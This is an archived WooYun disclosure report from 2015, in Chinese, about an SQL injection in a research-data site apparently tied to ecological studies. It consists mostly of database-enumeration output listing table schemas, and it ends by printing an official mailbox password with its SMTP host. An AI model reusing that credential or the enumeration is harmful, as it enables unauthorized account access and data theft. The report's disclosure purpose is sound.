乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-07: 细节已通知厂商并且等待厂商处理中 2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
科研数据,和生态环境有关的数据大量泄漏,研究生银行卡信息,官方邮箱密码等均泄漏,科研数据是和中科院有关的。
注入点:
1.http://**.**.**/index.jspID_lanmu=1
部分数据表:(可方面数据都很详细)
web application technology: JSPback-end DBMS: Microsoft SQL Server 2005Database: ESAppTable: lanmu_manage[12 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| CN | int || flag_name | nvarchar || ID_lanmu | nvarchar || lanmu | nvarchar || leixing_zilanmu | nvarchar || lianjie | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || zilanmu | nvarchar || zilianjie | nvarchar |+-----------------+----------+Database: ESAppTable: S4观测场样地配置信息表_明细[16 columns]+-------------------+----------+| Column | Type |+-------------------+----------+| CN | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SampSite_centerEL | decimal || SampSite_centerNL | decimal || SampSiteBeginTm | nvarchar || SampSiteCode | nvarchar || SampSiteEndTm | nvarchar || SampSiteName | nvarchar || SampSiteNote | nvarchar || SampSiteShape | nvarchar || SampSiteSize | decimal || SampSiteType | nvarchar || SheetNo | nvarchar || siteCode | nvarchar |+-------------------+----------+Database: ESAppTable: I1分类系统表_明细[9 columns]+--------------+----------+| Column | Type |+--------------+----------+| ClassCode | nvarchar || ClassName | nvarchar || ClassRank | nvarchar || ClassSysName | nvarchar || CN | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+--------------+----------+Database: ESAppTable: LA05湖泊微生物调查_明细[21 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || HH0000 | nvarchar || LA0500 | nvarchar || LA0502 | int || LA0504 | decimal || LA0506 | decimal || LA0508 | nvarchar || LA0510 | int || LA0512 | int || LA0514 | int || LA0516 | int || LA0518 | int || LA0520 | int || MM0000 | int || Rc1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: LA01湖泊浮游植物调查_明细[24 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || HH0000 | nvarchar || LA0100 | nvarchar || LA0102 | int || LA0104 | decimal || LA0106 | decimal || LA0108 | nvarchar || LA0110 | decimal || LA0112 | decimal || LA0114 | decimal || LA0116 | decimal || LA0118 | decimal || LA0120 | decimal || LA0122 | decimal || LA0124 | decimal || LA0126 | decimal || MM0000 | int || Rc1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: ecoTypeCode_明细[8 columns]+-------------+----------+| Column | Type |+-------------+----------+| CN | int || ecoType | nvarchar || ecoTypeCode | nvarchar || ecoTypeDesc | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+-------------+----------+Database: ESAppTable: D33自动站逐月太阳辐射总量及其累计值_明细[20 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || D3302 | decimal || D3304 | decimal || D3306 | decimal || D3308 | decimal || D3310 | decimal || D3312 | decimal || D3314 | nvarchar || D3316 | nvarchar || D3318 | nvarchar || D3320 | int || D3322 | int || MEM000 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: Tg01自动站每日逐时地表温度_明细[34 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MEM000 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || Tg0102 | decimal || Tg0104 | decimal || Tg0106 | decimal || Tg0108 | decimal || Tg0110 | decimal || Tg0112 | decimal || Tg0114 | decimal || Tg0116 | decimal || Tg0118 | decimal || Tg0120 | decimal || Tg0122 | decimal || Tg0124 | decimal || Tg0126 | decimal || Tg0128 | decimal || Tg0130 | decimal || Tg0132 | decimal || Tg0134 | decimal || Tg0136 | decimal || Tg0138 | decimal || Tg0140 | decimal || Tg0142 | decimal || Tg0144 | decimal || Tg0146 | decimal || Tg0148 | decimal || YYYY00 | int |+---------+----------+Database: ESAppTable: I2数据集分类表_明细[10 columns]+--------------+----------+| Column | Type |+--------------+----------+| ClassCode | nvarchar || ClassName | nvarchar || ClassRank | nvarchar || ClassSysName | nvarchar || CN | int || id | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+--------------+----------+Database: ESAppTable: disClassCode_明细[8 columns]+--------------+----------+| Column | Type |+--------------+----------+| CN | int || DisClass | nvarchar || DisClassCode | nvarchar || DisClassDesc | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+--------------+----------+Database: ESAppTable: M6分析记录表_明细[17 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| anaCiteInfo | nvarchar || anaInstr | nvarchar || AnaItem | nvarchar || anaMeth | nvarchar || anaNote | nvarchar || anaPerson | nvarchar || anaRepeatNum | int || anaStand | nvarchar || anaSubItem | nvarchar || anaTempExtent | nvarchar || CN | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || standSampleName | nvarchar || standSampleNo | nvarchar |+-----------------+----------+Database: ESAppTable: HB2自动站逐日水气压_明细[12 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MAX000 | decimal || MEAN00 | decimal || MIN000 | decimal || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: M8质控方法基本信息表_明细[12 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| CN | int || ErrDataNote | nvarchar || id | nvarchar || methQCStep1Desc | nvarchar || methQCStep2Desc | nvarchar || methQCStep3Desc | nvarchar || methQCStepNote | nvarchar || NullDataNote | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+-----------------+----------+Database: ESAppTable: TD1自动站每日逐时露点温度_明细[34 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MEM000 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || TD102 | decimal || TD104 | decimal || TD106 | decimal || TD108 | decimal || TD110 | decimal || TD112 | decimal || TD114 | decimal || TD116 | decimal || TD118 | decimal || TD120 | decimal || TD122 | decimal || TD124 | decimal || TD126 | decimal || TD128 | decimal || TD130 | decimal || TD132 | decimal || TD134 | decimal || TD136 | decimal || TD138 | decimal || TD140 | decimal || TD142 | decimal || TD144 | decimal || TD146 | decimal || TD148 | decimal || YYYY00 | int |+---------+----------+Database: ESAppTable: LA08湖泊浮游植物叶绿素_明细[16 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || HH0000 | nvarchar || LA0800 | nvarchar || LA0802 | int || LA0804 | decimal || LA0806 | decimal || LA0808 | nvarchar || LA0810 | decimal || MM0000 | int || Rc1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: A1属性信息表_明细[14 columns]+------------+----------+| Column | Type |+------------+----------+| attrDec | int || attrDesc | nvarchar || attrID | nvarchar || attrLength | int || attrName | nvarchar || attrSeq | int || attrType | nvarchar || attrUnit | nvarchar || CN | int || entID | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+------------+----------+Database: ESAppTable: S7外部链接文件信息表_明细[11 columns]+-------------+----------+| Column | Type |+-------------+----------+| CN | int || formatName | nvarchar || formatNote | nvarchar || formatVer | nvarchar || outFileName | nvarchar || RC1 | nvarchar || RCId | nvarchar || relObjCode | nvarchar || relObjType | nvarchar || RN | int || SheetNo | nvarchar |+-------------+----------+Database: ESAppTable: D32自动站逐日太阳辐射总量及其累计值_明细[21 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || D3202 | decimal || D3204 | decimal || D3206 | decimal || D3208 | decimal || D3210 | decimal || D3212 | decimal || D3214 | nvarchar || D3216 | nvarchar || D3218 | nvarchar || D3220 | int || D3222 | int || DD0000 | int || MEM000 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: email[8 columns]+----------+----------+| Column | Type |+----------+----------+| CN | int || name | nvarchar || password | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || stmp | nvarchar |+----------+----------+Database: ESAppTable: S3观测场自然背景信息表_明细[24 columns]+------------------+----------+| Column | Type |+------------------+----------+| CN | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || siteCode | nvarchar || siteDrainCapa | nvarchar || siteErosion | nvarchar || siteGeomorph | nvarchar || siteIfIrrigation | nvarchar || siteIrriCapa | nvarchar || siteIrriType | nvarchar || siteNonFrost | nvarchar || siteNote | nvarchar || siteOtherWea | nvarchar || sitePreci | nvarchar || siteRunoff | nvarchar || siteSlope | nvarchar || siteSoilParent | nvarchar || siteSoilType | nvarchar || siteSunhour | nvarchar || siteTemp | nvarchar || siteVegiType | nvarchar || siteWaterTable | nvarchar |+------------------+----------+Database: ESAppTable: 生态分区代码_明细[8 columns]+-------------+----------+| Column | Type |+-------------+----------+| CN | int || ecoType | nvarchar || ecoTypeCode | nvarchar || ecoTypeDesc | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+-------------+----------+Database: ESAppTable: newsList[9 columns]+--------------+----------+| Column | Type |+--------------+----------+| CN | int || newsFileName | nvarchar || newsID | nvarchar || newsPubDate | datetime || newsTitle | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+--------------+----------+Database: ESAppTable: HB1自动站每日逐时水气压_明细[34 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || HB102 | decimal || HB104 | decimal || HB106 | decimal || HB108 | decimal || HB110 | decimal || HB112 | decimal || HB114 | decimal || HB116 | decimal || HB118 | decimal || HB120 | decimal || HB122 | decimal || HB124 | decimal || HB126 | decimal || HB128 | decimal || HB130 | decimal || HB132 | decimal || HB134 | decimal || HB136 | decimal || HB138 | decimal || HB140 | decimal || HB142 | decimal || HB144 | decimal || HB146 | decimal || HB148 | decimal || MEM000 | nvarchar || MM0000 | decimal || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: M11仪器信息表_明细[11 columns]+---------------+----------+| Column | Type |+---------------+----------+| CN | int || instrCodeName | nvarchar || instrNote | nvarchar || instrPara | nvarchar || instrProd | nvarchar || instrProdDate | nvarchar || instrType | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+---------------+----------+Database: ESAppTable: M10仪器标定记录表_明细[12 columns]+---------------+----------+| Column | Type |+---------------+----------+| CaliDate | nvarchar || CaliMeth | nvarchar || CaliOrg | nvarchar || CaliPerson | nvarchar || CN | int || InstrCodeName | nvarchar || Note | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || ValidPeriod | nvarchar |+---------------+----------+Database: ESAppTable: lanmu_old[12 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| CN | int || flag_name | nvarchar || ID_lanmu | nvarchar || lanmu | nvarchar || leixing_zilanmu | nvarchar || lianjie | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || zilanmu | nvarchar || zilianjie | nvarchar |+-----------------+----------+Database: ESAppTable: LC02湖泊水化学要素_明细[42 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || HH0000 | nvarchar || LC0200 | nvarchar || LC0202 | int || LC0204 | decimal || LC0206 | decimal || LC0208 | nvarchar || LC0210 | decimal || LC0212 | decimal || LC0214 | decimal || LC0216 | decimal || LC0218 | decimal || LC0220 | decimal || LC0222 | decimal || LC0224 | decimal || LC0226 | decimal || LC0228 | decimal || LC0230 | decimal || LC0232 | decimal || LC0234 | decimal || LC0236 | decimal || LC0238 | decimal || LC0240 | decimal || LC0242 | decimal || LC0244 | decimal || LC0246 | decimal || LC0248 | decimal || LC0250 | decimal || LC0252 | nvarchar || LC0254 | decimal || LC0256 | decimal || LC0258 | decimal || LC0260 | decimal || LC0262 | decimal || MM0000 | int || Rc1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: down_application[14 columns]+---------------+----------+| Column | Type |+---------------+----------+| attr | nvarchar || CN | int || date1 | nvarchar || deal | nvarchar || entID | nvarchar || id | int || length | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || sql1 | nvarchar || tablename | nvarchar || userloginName | nvarchar |+---------------+----------+Database: ESAppTable: roleapply用户角色申请表_明细[7 columns]+---------------+---------+| Column | Type |+---------------+---------+| affiDeptName | varchar || applyTime | varchar || dealState | varchar || dealTime | varchar || deptName | varchar || id | bigint || userloginName | varchar |+---------------+---------+Database: ESAppTable: RH1自动站每日逐时相对湿度_明细[34 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MEM000 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RH102 | decimal || RH104 | decimal || RH106 | decimal || RH108 | decimal || RH110 | decimal || RH112 | decimal || RH114 | decimal || RH116 | decimal || RH118 | decimal || RH120 | decimal || RH122 | decimal || RH124 | decimal || RH126 | decimal || RH128 | decimal || RH130 | decimal || RH132 | decimal || RH134 | decimal || RH136 | decimal || RH138 | decimal || RH140 | decimal || RH142 | decimal || RH144 | decimal || RH146 | decimal || RH148 | decimal || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | decimal |+---------+----------+Database: ESAppTable: Q1数据质量信息表_明细[18 columns]+--------------+----------+| Column | Type |+--------------+----------+| AttribName | nvarchar || CN | int || DimName | nvarchar || DQBeginTm | nvarchar || DQCode | nvarchar || DQEndTm | nvarchar || DQName | nvarchar || DQScopeCode | nvarchar || entName | nvarchar || evalDate | nvarchar || evalMethDesc | nvarchar || evalPerson | nvarchar || evalResult | nvarchar || id | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+--------------+----------+Database: ESAppTable: 资金来源代码_明细[8 columns]+----------+----------+| Column | Type |+----------+----------+| CN | int || FundCode | nvarchar || FundDesc | nvarchar || FundName | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+----------+----------+Database: ESAppTable: M1方法基本信息表_明细[14 columns]+----------------+----------+| Column | Type |+----------------+----------+| CN | int || methBeginTm | nvarchar || methCode | nvarchar || methDesignDesc | nvarchar || methEndTm | nvarchar || methName | nvarchar || methSeq1 | int || methType | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SampSiteCode | nvarchar || SampSiteName | nvarchar || SheetNo | nvarchar |+----------------+----------+Database: ESAppTable: Tg02自动站逐日地表温度_明细[12 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MAX000 | decimal || MEAN00 | decimal || MIN000 | decimal || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | decimal |+---------+----------+Database: ESAppTable: RH2自动站逐日相对湿度_明细[12 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MEAN00 | decimal || MIN000 | decimal || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || TIME20 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: D42自动站逐日太阳辐射极值及其出现时间_明细[28 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || D4202 | decimal || D4204 | nvarchar || D4206 | decimal || D4208 | nvarchar || D4210 | decimal || D4212 | nvarchar || D4214 | decimal || D4216 | nvarchar || D4218 | decimal || D4220 | nvarchar || D4222 | decimal || D4224 | nvarchar || D4226 | decimal || D4228 | nvarchar || D4230 | decimal || D4232 | nvarchar || D4234 | decimal || D4236 | nvarchar || DD0000 | int || MEM000 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: VertDatumCode_明细[8 columns]+--------------+----------+| Column | Type |+--------------+----------+| CN | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || VertDatum | nvarchar || VertDatumCd | int || VertDatumDes | nvarchar |+--------------+----------+Database: ESAppTable: Proj1项目信息表_明细[14 columns]+-------------+----------+| Column | Type |+-------------+----------+| CN | int || parentProj | nvarchar || projAbs | nvarchar || projBeginTm | datetime || projCode | nvarchar || projEndTm | datetime || projFund | nvarchar || projName | nvarchar || projPersons | nvarchar || projPurp | nvarchar || Rc1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+-------------+----------+Database: ESAppTable: D43自动站逐月太阳辐射极值及其出现时间_明细[23 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || D4302 | decimal || D4304 | int || D4306 | nvarchar || D4308 | decimal || D4310 | int || D4312 | nvarchar || D4314 | decimal || D4316 | int || D4318 | nvarchar || D4320 | decimal || D4322 | int || D4324 | nvarchar || D4326 | decimal || D4328 | int || D4330 | nvarchar || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | int |+---------+----------+Database: ESAppTable: TD2自动站逐日露点温度_明细[12 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MAX000 | decimal || MEAN00 | decimal || MIN000 | decimal || MM0000 | int || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar || SSS000 | nvarchar || YYYY00 | decimal |+---------+----------+Database: ESAppTable: noticeList[9 columns]+----------------+----------+| Column | Type |+----------------+----------+| CN | int || noticeFileName | nvarchar || noticeID | nvarchar || noticePubDate | datetime || noticeTitle | nvarchar || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |+----------------+----------+Database: ESAppTable: S1观测场基本信息表_明细[18 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| || C | 0 || CN | int || RC1 | 0x6e0076006 || RCId | nvarchar || site_centerNL | decimal || siteAfterMana | nvarchar || siteBeforeMana | nvarchar || sitebeginTm | datetime || SiteCode | nvarchar || siteEcoType | nvarchar || siteEndTm | datetime || SiteName | nvarchar || sitesamSiteConf | nvarchar || siteShape | nvarchar || siteSize | decimal || typiAreaName | nvarchar || x | 4 |+-----------------+-------------+Database: ESAppTable: R1自动站每日逐时降水_明细[34 columns]+---------+----------+| Column | Type |+---------+----------+| CN | int || DD0000 | int || MEM000 | nvarchar || MM0000 | int || R102 | decimal || R104 | decimal || R106 | decimal || R108 | decimal || R110 | decimal || R112 | decimal || R114 | decimal || R116 | decimal || R118 | decimal || R120 | decimal || R122 | decimal || R124 | decimal || R126 | decimal || R128 | decimal || R130 | decimal || R132 | decimal || R134 | decimal || R136 | decimal || R138 | decimal || R140 | decimal || R142 | decimal || R144 | decimal || R146 | decimal || R148 | decimal || RC1 | nvarchar || RCId | nvarchar || RN | int || SheetNo | nvarchar |
官方邮箱泄漏,密码可进入搜狐邮箱:
web application technology: JSPback-end DBMS: Microsoft SQL Server 2005Database: ESAppTable: email[1 entry]+-----------------+----------+---------------+----+| name | password | stmp | CN |+-----------------+----------+---------------+----+| [email protected] | 68756834 | mail.sohu.com | NULL |+-----------------+----------+---------------+----+
搜狐邮箱截图:
危害等级:无影响厂商忽略
忽略时间:2015-04-13 16:58
漏洞Rank:4 (WooYun评价)
暂无